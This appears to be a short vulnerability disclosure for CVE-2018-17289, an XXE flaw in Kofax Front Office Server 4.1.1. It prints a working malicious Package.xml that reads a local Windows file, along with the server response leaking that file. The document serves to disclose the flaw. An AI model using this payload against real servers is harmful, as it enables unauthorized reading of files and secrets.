CVE-2018-17289-XXE-Kofax
An XML external entity (XXE) vulnerability in Kofax Front Office Server Administration Console version 4.1.1.11.0.5212 allows remote authenticated users to read arbitrary files via crafted XML inside an imported package configuration (.ZIP file) within the Kofax/KFS/Admin/PackageService/package/upload file parameter.
The package archive contains two files: Package.xml and Shortcuts.xml. We modify the Package.xml file in order to include a known windows file in the name of the package:
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
]>
<Package>
<Name><r>&sp;</r></Name>
<Description></Description>
</Package>
After zipping the two files and uploading the file in the application the XML file is processed and the file is included in the response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Server: Removed
X-Frame-Options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Date: Removed
Connection: close
Content-Length: 2157
{"ErrorCode":0,"ErrorMessage":"","RedirectURL":"","ErrorKey":null,"ErrorLevel":0,"AdminObject":{"Version":"00000000-0000-0000-0000-000000000000","Description":"","ID":"00000000-0000-0000-0000-000000000000","Name":"# Copyright (c) 1993-2009 Microsoft Corp.\u000d\u000a#\u000d\u000a# This is a sample HOSTS file used by Microsoft TCP\/IP for Windows.\u000d\u000a#\u000d\u000a# This file contains the mappings of IP addresses to host names. Each\u000d\u000a# entry should be kept on an individual line. The IP address should\u000d\u000a# be placed in the first column followed by the corresponding host name.\u000d\u000a# The IP address and the host name should be separated by at least one\u000d\u000a# space.\u000d\u000a#\u000d\u000a# Additionally, comments (such as these) may be inserted on individual\u000d\u000a# lines or following the machine name denoted by a '#' symbol.\u000d\u000a#\u000d\u000a# For example:\u000d\u000a#\u000d\u000a# 102.54.94.97 rhino.acme.com # source server\u000d\u000a# 38.25.63.10 x.acme.com # x client host\u000d\u000a\u000d\u000a# localhost name resolution is handled within DNS itself.\u000d\u000a#\u0009127.0.0.1 localhost\u000d\u000a#\u0009::1 localhost\u000d\u000a"},"ArchivePath":"1.0:Shared:dc9a6689-7c39-4263-875f-7090d42b12fe\\dttop2.zip:False:File","AssociatedDestinations":[],"AssociatedShortcuts":[{"Version":"f86ce36b-86b3-4e7b-93d5-2afd0b67fe71","AdvancedPermission":{"SubmitAllOnThinClient":true},"Description":null,"DestinationReference":{"PrimaryKey":"5c6ea28b-ddc6-41f6-b879-d30c242196f4","NaturalKey":"Kofax Capture"},"ID":"52ed31fc-b35c-4b91-ab3d-07bf280075e9","IsVisibleOnMFP":true,"IsVisibleOnMobile":true,"IsVisibleOnThinClient":true,"Name":"OP","Namespace":null},{"Version":"ddd1b8d2-f497-4ad8-90f7-749246fca211","AdvancedPermission":{"SubmitAllOnThinClient":true},"Description":null,"DestinationReference":{"PrimaryKey":"5c6ea28b-ddc6-41f6-b879-d30c242196f4","NaturalKey":"Kofax Capture"},"ID":"896d16ec-b27e-49c9-a21d-cb38a6d28319","IsVisibleOnMFP":true,"IsVisibleOnMobile":true,"IsVisibleOnThinClient":true,"Name":"PAID","Namespace":null}]}